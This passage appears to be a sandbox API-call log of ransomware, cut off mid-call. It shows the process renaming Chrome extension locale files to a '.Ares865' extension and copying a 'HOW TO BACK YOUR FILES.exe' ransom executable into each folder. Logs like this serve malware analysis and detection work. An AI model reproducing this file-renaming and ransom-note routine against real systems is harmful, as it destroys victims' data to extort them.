[0102.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.781] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da" [0102.781] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da" [0102.781] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.781] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.782] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.782] GetLastError () returned 0x0 [0102.782] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec4ba60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec4ba60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.782] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.782] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.783] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.Ares865") returned 162 [0102.783] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.788] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs" [0102.788] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs" [0102.788] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.788] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.789] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.789] GetLastError () returned 0x0 [0102.789] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec4ba60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec4ba60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.789] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.789] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.790] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.Ares865") returned 162 [0102.790] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.797] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca" [0102.798] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca" [0102.798] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.798] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.798] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.799] GetLastError () returned 0x0 [0102.799] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec71bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec71bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.799] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.Ares865") returned 162 [0102.799] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.801] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.804] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg" [0102.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg" [0102.804] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.804] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.805] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.805] GetLastError () returned 0x0 [0102.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec71bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec71bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.805] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.806] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.Ares865") returned 162 [0102.806] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.807] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.810] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar" [0102.811] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar" [0102.811] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.811] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.811] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.812] GetLastError () returned 0x0 [0102.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec71bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec71bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.812] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.812] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.Ares865") returned 162 [0102.812] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.Ares865" (normalized: 